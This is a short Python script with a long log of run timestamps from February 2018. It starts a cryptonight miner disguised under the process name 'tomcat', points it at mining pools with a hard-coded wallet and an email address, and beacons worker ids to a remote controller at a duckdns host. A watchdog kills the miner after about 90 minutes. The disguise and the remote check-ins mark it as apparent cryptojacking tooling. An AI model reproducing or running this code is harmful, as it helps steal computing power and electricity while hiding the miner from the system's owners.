import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:29:04.941414
#2018-02-17 17:16:06.816532
#2018-02-17 19:04:03.729142
#2018-02-17 20:51:04.627023
#2018-02-17 22:38:05.280145
#2018-02-18 00:22:07.206230
#2018-02-18 02:13:07.011157
#2018-02-18 04:02:03.604533
#2018-02-18 05:53:07.428572
#2018-02-18 07:43:03.950243
#2018-02-18 09:31:06.123929
#2018-02-18 11:17:01.482124
#2018-02-18 13:03:04.111917
#2018-02-18 14:51:07.009838
#2018-02-18 16:39:06.755643
#2018-02-18 18:28:06.790023
#2018-02-18 20:17:03.629776
#2018-02-18 22:02:05.146574
#2018-02-18 23:51:02.012526
#2018-02-19 01:37:04.386686
#2018-02-19 03:25:06.844202
#2018-02-19 05:10:01.818596
#2018-02-19 06:56:04.631189
#2018-02-19 08:45:07.845241
#2018-02-19 10:34:06.115841
#2018-02-19 12:22:04.183168
#2018-02-19 14:10:09.880013
#2018-02-19 15:58:06.647004
#2018-02-19 17:47:11.819426
#2018-02-19 19:36:05.215268
#2018-02-19 21:25:06.976318
#2018-02-19 23:11:05.723929
#2018-02-20 00:56:06.039285
#2018-02-20 02:48:07.212849
#2018-02-20 04:35:04.060710
#2018-02-20 06:18:07.304671
#2018-02-20 08:03:07.653236
#2018-02-20 09:48:07.758747
#2018-02-20 11:33:09.307859
#2018-02-20 13:20:01.737149
#2018-02-20 15:04:01.790605
#2018-02-20 16:49:06.411232
#2018-02-20 18:38:07.082971
#2018-02-20 20:31:01.967339
#2018-02-20 22:17:08.191645
#2018-02-20 23:58:02.093865
#2018-02-21 01:44:09.866031
#2018-02-21 03:33:05.706525
#2018-02-21 05:22:06.621761
#2018-02-21 07:09:05.778372
#2018-02-21 08:56:01.990135
#2018-02-21 10:46:06.779114
#2018-02-21 12:33:09.021547
#2018-02-21 14:20:10.618541
#2018-02-21 16:07:06.705576
#2018-02-21 17:57:08.746731
#2018-02-21 19:44:02.146037
#2018-02-21 21:33:04.288584
#2018-02-21 23:18:07.844255
#2018-02-22 01:08:04.629767
#2018-02-22 02:56:04.910703
#2018-02-22 04:42:05.476630
#2018-02-22 06:27:03.861240
#2018-02-22 08:14:04.630850
#2018-02-22 10:03:01.470643
#2018-02-22 11:47:04.014346
#2018-02-22 13:33:01.456956
#2018-02-22 15:23:01.744960
#2018-02-22 17:08:09.831762
#2018-02-22 18:56:05.000024
#2018-02-22 20:48:02.228626
#2018-02-22 22:34:04.826594
#2018-02-23 00:19:01.828106
#2018-02-23 02:08:05.210749
#2018-02-23 03:53:07.196691
#2018-02-23 05:37:03.276175
#2018-02-23 07:22:01.688229
#2018-02-23 09:26:07.866400
#2018-02-23 11:32:01.580624
#2018-02-23 13:22:04.722516
#2018-02-23 15:07:09.100326
#2018-02-23 16:56:09.996879
#2018-02-23 18:35:01.278169
#2018-02-23 20:24:06.083764
#2018-02-23 22:11:07.743476
#2018-02-23 23:58:06.557278
#2018-02-24 01:47:07.222521
#2018-02-24 03:41:01.972715
#2018-02-24 05:26:05.791141
#2018-02-24 07:13:06.290325
#2018-02-24 09:02:03.974652
#2018-02-24 11:02:08.230048
#2018-02-24 12:51:07.622313
#2018-02-24 14:39:06.293889
#2018-02-24 16:28:01.952506
#2018-02-24 18:19:04.068813
#2018-02-24 20:05:06.183255
#2018-02-24 21:47:04.655670
#2018-02-25 00:47:02.098147
#2018-02-25 04:32:05.271681
#2018-02-25 07:58:04.863072